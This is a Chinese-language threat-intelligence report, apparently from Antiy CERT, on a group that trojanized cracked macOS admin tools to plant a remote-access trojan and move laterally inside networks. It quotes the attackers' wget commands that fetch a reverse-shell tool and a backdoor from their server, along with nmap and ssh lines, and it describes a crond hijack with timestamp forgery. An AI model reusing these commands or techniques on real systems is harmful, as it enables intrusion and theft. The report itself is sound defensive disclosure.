“暗蚊”黑产团伙通过国内下载站传播Mac远控木马攻击活动分析

时间 :  2024年01月19日  来源:  安天CERT

1.概述


近期,安天CERT发现一组利用非官方软件下载站进行投毒和攻击下游用户案例,并深入分析了攻击者在网管运维工具上捆绑植入macOS平台远控木马,利用国内非官方下载站发布,以此取得政企机构内部关键主机桥头堡,进行横向渗透的攻击活动。

此下载站目前可下载数十个破解软件,其中五款运维工具包含恶意文件,这五款运维工具集中在服务运维工具分类中,安天CERT判断该事件针对的目标为国内IT运维人员。当运维人员寻找macOS平台下免费或破解的运维工具时可能会搜索到该下载站,如果下载执行了含有恶意文件的运维工具,那么恶意文件会连接攻击者服务器下载并执行远控木马,攻击者可通过此远控木马窃取主机中的数据和文件,确定受害者及所在单位的信息,为后续横向渗透做准备。

安天CERT以攻击者发起的一起实际行动为案例,揭示攻击者横向渗透的手段:攻击者使用远程控制的方式窃取了受害者macOS操作系统主机中的文件;下载并使用fscan、nmap等工具对受害者的内网进行扫描,以获取内网更多服务器和主机的信息;利用口令破解、漏洞利用等渗透手段尝试获取更多服务器和主机的系统权限,横向渗透成功后在服务器上部署并运行hellobot后门。在此次行动中,虽然攻击者的横向渗透水平相对较弱,但是依然成功获取了服务器的系统权限。入侵成功后可能导致数据被窃、信息泄露、被长期监视等安全风险。

安天CERT的分析人员在搜索站搜索“Mac破解软件”等关键字时,该下载站在Google搜索站排名第一,在Bing搜索站排名第七。从该下载站的下载数量来看,含有恶意文件的五款运维工具下载总量已超3万次。安天CERT评估此次攻击活动影响范围较大,且大部分威胁情报平台尚未标记相关的恶意IoC情报,故披露此次攻击活动。建议在该下载站下载过这类运维工具的用户进行自查。

该黑产团伙采用供应链投毒、伪造官方软件网站、以及利用破解软件等多种方式传播恶意程序,主要攻击目标是IT运维人员,攻击范围涵盖了Windows、Linux以及macOS等操作系统。此外,该团伙使用经过精心构造的域名,并对下载的载荷文件进行混淆处理,以规避安全产品的检测,因此安天CERT用“暗蚊”组织命名该团伙。

在即将发布该报告时,安天CERT关联到了近期深信服披露的报告《【高级持续威胁(APT)】谁是“amdc6766”:一年四起供应链投毒事件的幕后黑手》[1],发现此次事件攻击活动中攻击者可能与友商披露的攻击者为同一批团伙。本次事件中用于传播的工具都是IT运维人员日常使用频次较高的软件工具,两起事件针对的目标重合;在诱饵工具名称和域名的伪装方面思路相似;载荷使用了相同的域名。

2.详细情况


2.1 监测情况

安天CERT监测到“MACYY”下载站上SecureCRT、FinalShell、Navicat等五款运维工具含有恶意文件。如果在macOS操作系统的主机中执行上述工具便会加载恶意文件,连接攻击者C2服务器下载执行远控木马。安天CERT的分析人员在搜索站搜索 “Mac破解软件”等关键字时,该下载站在Google搜索站排名第一,在Bing搜索站排名第七。

图2‑1 该下载站Google搜索站排名第一

SecureCRT、FinalShell、Navicat、UltraEdit、Microsoft Remote Desktop共五款运维工具被植入恶意文件:

图2‑2 红框中为此次发现被植入恶意代码的运维工具

从该下载站的下载数量来看,含有恶意文件的五款运维工具下载总量已超3万次。安天CERT评估此次攻击活动影响范围较大,且大部分威胁情报平台尚未标记相关的恶意IoC情报,故披露此次攻击活动。建议在该下载站下载过这类运维工具的用户进行自查,详细自查方法请参考本报告第六小节。

表2‑1 被植入恶意文件的运维工具相关信息

文件名

MD5

被植入恶意文件名

下载量

SecureCRT.dmg

94E0EE6189DF1DAD0EFB01374D67815C

libpng.dylib

6094

ultraedit.dmg

3FF4C5A86CE6A35B6D9A49478BD1058D

libConfigurer64.dylib

6716

Microsoft-Remote-Desktop-Beta-10.8.0(2029)_MacYY.dmg

81F75533298736A23597A34B505209B5

libpng.dylib

1507

FinalShell_MacYY.dmg

808B17A47A91421F50AF04A865DE26C7

libpng.dylib

824

navicat161_premium_cs.dmg

B74301CB51FB165F1ED8F2676A39FBBF

libpng.dylib

16188

当运维人员寻找macOS平台下免费的运维工具时被引流到该下载站,并从中下载执行含有恶意文件的运维工具。恶意文件会连接C2下载远控执行。攻击者在构造恶意域名时,针对不同运维工具采用不同域名且字符串与对应的运维工具文件名相关,从而增加通信隐蔽性。

表2‑2 被植入恶意文件的运维工具文件名和恶意域名

文件名

恶意域名

SecureCRT.dmg

download.securecrt.vip

ultraedit.dmg

download.ultraedit.info

Microsoft-Remote-Desktop-Beta-10.8.0(2029)_MacYY.dmg

download. rdesktophub.com

FinalShell_MacYY.dmg

download.finallshell.cc

navicat161_premium_cs.dmg

download.Macnavicat.com

2.2 攻击活动的时间线

安天CERT分析了此次攻击活动的时间线。攻击者从2023年3月份便着手开始策划此次攻击活动,其最早开始于3月20日注册了其所使用部分的C2域名,在3月至7月期间攻击者陆续注册了此次攻击活动中所涉及的10个C2域名,并在期间攻击者将使用的部分载荷上传至VT测试其免杀效果。最后攻击者在9月19日和20日将被植入恶意文件的五款运维工具上传至该下载站。

图2‑3 安天CERT还原此次攻击活动时间线

3.攻击流程


被植入恶意文件的破解软件包含IT运维人员常用的SecureCRT、FinalShell、Navicat等五款运维工具。运维工具运行后连接攻击者C2服务器下载远控木马,该远控木马是攻击者基于开源跨平台KhepriC2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力。

3.1 初始访问攻击

由于攻击者在这五款运维工具中所采用的攻击方式一样,初始访问攻击以破解版的SecureCRT软件分析为例进行展开。攻击者将恶意文件libpng.dylib添加至破解版的SecureCRT软件中并将其投放至下载站。当用户运行该软件后,软件加载被植入的恶意文件libpng.dylib,连接攻击者搭建的C2服务器下载名为se01.log和bd.log两个加密载荷。libpng.dylib对se01.log文件解密后释放Mac远控木马,该木马是攻击者基于开源跨平台Khepri C2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力;libpng.dylib对bd.log文件解密后释放一个名为fseventsd的加载器,该加载器会将自身添加至开机启动项中,以实现持久化。截至安天CERT分析时该加载器用于下载其他载荷的URL已失效且未在公开情报系统中关联到,故无法分析其最终落地载荷。

图3‑1 破解版的SecureCRT软件攻击流程

3.2 内网横向移动流程

安天CERT以攻击者发起的一起实际行动为案例,揭示攻击者横向渗透的手段:

图3‑2 攻击者内网横向移动攻击流程

步骤1:远控下载反向Shell工具

在受害者macOS操作系统主机中成功植入Khepri远控木马后,攻击者访问恶意软件服务器下载了一个基于开源跨平台工具goncat进行修改的木马,该木马的主要功能是实现反向Shell连接。攻击者下载goncat木马命令如下:

wget http://159.75.xxx.xxx:443/mac2

步骤2:文件窃取和分析

攻击者利用该木马将受害者macOS操作系统主机中的各类文件上传至匿名文件共享服务托管平台oshi.at上。攻击者基于所收集到的文件进行分析,为进一步的横向移动做准备。

图3‑3 匿名文件共享服务托管平台oshi.at

步骤3:内网网络扫描

攻击者下载了fscan、nmap等扫描工具,并使用nmap网络扫描工具对开放了22端口的主机进行扫描。此外,攻击者还利用fscan扫描工具对内网进行了扫描,以获取内网更多服务器和主机的信息,包括主机存活信息、端口信息、常见服务信息、Windows网卡信息、Web指纹信息以及域控信息等。使用nmap工具扫描某网段命令如下所示:

nmap -Pn -p22 -oG - 172.xx.xx.xxx/24

步骤4:使用多种渗透手段:

攻击者利用Web漏洞和SSH暴力破解等手段来获取受害者更多的服务器和主机访问权限。使用ssh登陆某服务器命令如下:

ssh xxxxx@172.xx.xx.xxx

步骤5:部署后门进行持久化

攻击者会访问恶意软件服务器下载一个名为centos7的文件,该文件运行后会在当前路径下释放一个名为libdb.so.2的文件,利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,加载执行恶意文件libdb.so.2。经分析发现libdb.so.2文件为hellobot后门,该后门主要功能有文件管理、远程Shell、端口扫描、服务代理等。下载Centos7文件命令如下所示:

wget http://159.75.xxx.xxx:8088/centos7

尽管在此次行动中,攻击者的横向移动整体水平相对较弱,然而并不能忽略其所带来的危害。即使攻击者横向移动能力有限,但仍能通过成功植入恶意软件、利用漏洞和暴力破解等手段,对受害者的系统和数据造成严重的损害。这种攻击形式可能导致敏感信息泄露、系统崩溃、服务中断以及进一步的攻击扩散,对受害者的隐私和安全构成潜在风险。因此,需认真对待这些攻击,并采取适当的安全措施来保护系统和数据免受威胁。

4.关联分析


经关联分析发现,“暗蚊”黑产团伙可能与近期友商披露的报告《【高级持续威胁(APT)】谁是“amdc6766”:一年四起供应链投毒事件的幕后黑手》中的攻击者为同一团伙。本次事件中用于传播的工具都是IT运维人员日常使用频次较高的软件工具,两起事件针对的目标重合;在诱饵工具名称和域名的伪装方面思路相似;载荷使用了相同的域名。

1. 本次事件针对IT运维人员,且工具名称和使用的域名相似

攻击者在下载站中上传的破解软件SecureCRT、Ultraedit、Microsoft-Remote-Desktop-Beta、FinalShell、Navicat,都是IT运维人员日常使用频次较高的软件工具,且都被归于该网站的“服务器运维”类别中,表明攻击者有针对性地对IT运维人员进行攻击。

此外,攻击者在本次攻击活动中用于托管恶意载荷的域名,形式上也与攻击者在此前攻击活动中使用的相似。

表4‑1 攻击者在攻击活动中用于托管恶意载荷的域名

此次攻击活动中用于托管Mac恶意载荷的域名

此前攻击活动中用于托管恶意载荷的域名

download.securecrt.vip

download.oneinstack.club

download.ultraedit.info

download.cnoneinstack.club

download. rdesktophub.com

download.lnmp.life

download.finallshell.cc

download.cnoneinstack.com

download.Macnavicat.com

download.amh.tw

2. 使用crond服务持久化和后门动态链接库手法与友商披露类似

本次攻击活动中攻击者在内网Linux机器上访问恶意软件服务器下载一个名为centos7的文件,该文件运行后会在当前路径下释放一个名为libdb.so.2的文件,利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,加载执行恶意文件libdb.so.2。其中使用crond服务持久化和后门动态链接库手法类似。

3. 最终载荷使用的恶意域名amdc6766.net相同

在本次攻击活动中,攻击者在内网Linux机器上使用的最终载荷为hellobot后门,其外联域名为Microsoft.amdc6766.net,与友商分析报告中披露的恶意域名相同。

5.样本详细分析


5.1 破解版SecureCRT软件分析

由于攻击者在这五款运维工具中所采用的攻击方式一样,样本详细分析以破解版的SecureCRT软件分析为例。

表5‑1 破解版SecureCRT软件样本标签

病毒名称

Trojan/MacOS.DarkMozzie[Backdoor]

原始文件名

SecureCRT.dmg

MD5

94E0EE6189DF1DAD0EFB01374D67815C

文件格式

Macintosh Disk Image

文件大小

44.47 MB (46625933 字节)

数字签名

加壳类型

VT首次上传时间

2023-11-29 07:11:15

VT检测结果

17 / 59

注:可在计算机病毒分类命名百科全书Virusview.net,搜索“DarkMozzie”查看更多该病毒家族相关信息。

SecureCRT是VanDyke Software公司开发的一个商业SSH、Telnet客户端和虚拟终端软件。本次攻击活动破解版SecureCRT软件相较于官网提供的SecureCRT,在Frameworks文件夹中多出一个名为“libpng.dylib”的动态库文件。

图5‑1 SecureCRT官方版本与破解版本对比

破解版SecureCRT的主Mach-O文件运行时会对该动态库文件libpng.dylib进行加载。

图5‑2 破解版SecureCRT加载libpng.dylib

5.1.1 libpng.dylib文件分析

libpng.dylib从硬编码的URL处获取下一阶段载荷文件,解码后保存至指定的路径中执行。

图5‑3 libpng.dylib用于获取下一阶段的载荷文件

对下载的载荷进行解密算法如下所示:

图5‑4 解密算法

5.1.2 解密后的.test文件分析

解密后的.test文件与指定的C2域名进行连接。

图5‑5 与指定C2域名连接

该木马是攻击者基于开源跨平台KhepriC2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力。

图5‑6 开源平台Khepri远控功能

5.1.3 解密后的.fseventsd文件分析

.fseventsd文件会将自身添加至开机启动项中,以实现持久化。

图5‑7 将自身添加至开机启动项

.fseventsd文件从硬编码的URL处获取文件,并下载至指定路径中,截至安天CERT分析时该加载器用于下载其他载荷的URL已失效,故无法分析其最终落地载荷。

图5‑8 下载其他载荷

5.2 内网横向移动使用的样本分析
5.2.1 mac2文件分析

mac2文件是基于开源跨平台工具goncat进行修改的木马,该木马除了支持反弹Shell,同时还支持自删除功能等。安天CERT推测,攻击者在受害者macOS操作系统主机上再次下载一个木马的原因可能是方便执行命令。

图5‑9 样本调用函数

图5‑10 样本命令行运行截图

5.2.2 centos7文件分析

centos7样本读取自身内容,并根据“ELFELF”找到标记的偏移位置,将该位置后的内容写入当前路径中,并命名为“libdb.so.2”。

图5‑11 释放libdb.so.2文件

利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,以加载执行恶意文件libdb.so.2。

图5‑12 劫持crond服务的动态库文件,并修改时间属性值

libdb.so.2是一个hellobot后门,其解密后的配置信息如下图所示。

图5‑13 该hellobot后门的配置信息

配置信息中每一项配置所对应的功能如下表所示。

表5‑2 配置信息功能

配置项

功能

host

上线地址及端口

group

组名称

install_path

安装后的文件名称

install_path_bak

安装之后备份的文件路径

retry_interval

重连的时间间隔

dns

域名解析使用的DNS

fake_ps

伪装的进程名称

auto_start

是否自启动

note

备注

lock_file

锁文件

plugin_dir

插件目录

mon_interval

监控进程循环执行检测的时间间隔

close_iptable

是否自动清除iptables规则

protocol

通信时使用的协议

该hellobot后门的功能包括如下表所示的内容。

表5‑3 功能列表

功能分类

备注

CManager

对受控设备进行管理

CFileTask

对受控设备中的文件进行管理

CPortMapTask

端口扫描

CShellTask

执行Shell命令

CPluginTask

对插件进行管理

CProxyTask

服务器代理操作

6.安全建议


针对以“暗蚊”为代表的黑产团伙,以IT运营者使用远程访问、编辑器、数据库管理等免费或破解版运维工具作为突破口投放攻击载荷,通过网内横向移动,进一步收集信息并维持持久化,最终窃取主机中的数据和文件的攻击模式,安天CERT建议:

6.1 开展针对性自查

1、对于使用苹果操作系统的IT运营者

(1)确认是否曾在MACYY或其它网站中下载以下运维工具并核对破解软件的MD5:远程访问(SecureCRT、FinalShell 、Microsoft Remote Desktop)、编辑器(UltraEdit)、数据库管理(Navicat Premium);

图6‑1 确认是否曾下载这些运维工具

(2)检查/tmp/目录中是否存在.test、.fseventsds文件,/Users/Shared/目录中是否存在.fseventsd文件,并检查.fseventsd文件是否被设置为开机启动项。

2、对于使用Linux操作系统的IT运营者

(1)检查/usr/sbin/cron(或crond)文件近期是否被改动;

(2)检查/usr/sbin/cron(或crond)文件所依赖的动态链接库中是否存在libdb.so.2文件;

(3)检查libdb.so.2文件是否存在问题:检查MD5是否为F23ED5D991CF0C8AA8378774E8FA93FE,或者检查libdb.so.2文件的改动时间是否与/usr/sbin/cron(或crond)文件的改动时间相近。

6.2 增强正版软件使用意识

建议IT运营者(尤其是使用苹果操作系统的IT运营者)从官方地址下载常用运维工具,以破解为代表的免费下载站极大可能存在供应链污染,尤其不要相信“苹果操作系统上不会存在病毒”的伪科普。更重要的是,由于IT运营者在使用苹果设备时极大可能不会经常关机,以致“暗蚊”黑产团伙通过远控并持续窃密留下了可乘之机。

6.3 加强主机侧安全防护

建议IT运营者部署企业级终端防御系统,加强针对“暗蚊”黑产团伙在内网横向移动环节的防护。安天智甲终端防御系统具有网络防护和内核级主动防御能力,针对暴力破解登录环节,智甲可通过流量检测、虚拟补丁、登录行为检测等能力发现并拦截恶意入侵行为;针对投递名为centos7的远控后门的环节,智甲第一时间感知新增文件并查杀远控后门。由于当前已知攻击范围已覆盖多个平台,建议已部署Windows、Linux的智甲产品用户启用主动防御功能,并保持病毒库更新到最新。

图6‑2 智甲管理中心可集中查看远控后门投递事件并统一处置

图6‑3 智甲客户端发现暴力破解登陆,供用户在管理中心查看事件详情

安天睿甲云主机安全监测系统面向各类云主机环境,具有全面的网络防护能力,针对"暗蚊"类恶意入侵事件,可以从端点暴破、横向移动、新增文件、修改配置等多个环节进行全链路的检测,根据不同的攻击阶段对其行为进行溯源分析,第一时间感知威胁,并进行清除,深度还原攻击路径,为固证取证提供有力的支持。建议已经部署睿甲产品的用户启用文件实时监控功能,并更新病毒库至最新版。

图6‑4 睿甲云主机安全系统发现恶意入侵自动告警

6.4 提升网络威胁监测与响应

建议IT运营者部署网络威胁检测与响应系统(NTA或NDR)可以结合“暗蚊”相关信标进行告警。安天探海威胁检测系统集成了恶意代码检测引擎、网络行为检测引擎、威胁情报引擎、威胁检测模型、自定义场景检测引擎等,可针对“暗蚊”前期横向移动环节,有效检测下载进一步载荷的攻击组件行为;可针对“暗蚊”成功感染目标后的命令与控制环节,有效检测解析C2服务器域名、上线报文、控制指令,并建议已经部署探海产品的用户及时更新规则库和配置告警策略,持续应对此类攻击。

图6‑5 安天探海威胁检测系统检测远控木马通信

6.5 遭受攻击及时应急处置

IT运营者若在针对性自查或日常工作中发现疑似遭受“暗蚊”黑产团伙的攻击,可以联系安天应急响应团队(CERT@antiy.cn)处置威胁,或拨打安天7*24小时服务热线400-840-9234寻求帮助。建议及时隔离被攻击的主机,并保护现场等待安全工程师对主机进行排查。

7.IoCs


IoCs

94E0EE6189DF1DAD0EFB01374D67815C

3FF4C5A86CE6A35B6D9A49478BD1058D

81F75533298736A23597A34B505209B5

735B14D2D9BB4AA848B555AD6F567307

B74301CB51FB165F1ED8F2676A39FBBF

20BA990BE3773C179A4200BC8950463A

4D211EA7D1961B029D30F76FA98C0320

F23ED5D991CF0C8AA8378774E8FA93FE

06158766498ACAC14C70BE52A6C6FDF3

32421A007F28AACF869A46F714945AD0

8.致谢


在此,感谢安全研究员Zero17010提供的线索和帮助,共同完成了本次事件的恶意组织披露。为我们研究这次攻击事件提供了有力支持,帮助我们更深入地了解了攻击者的技战术。

参考链接


[1] 深信服.【高级持续威胁(APT)】谁是“amdc6766”:一年四起供应链投毒事件的幕后黑手 [R/OL].(2023-12-29)
https://mp.weixin.qq.com/s/R0kn5STsiwIUhIqVRwnNxw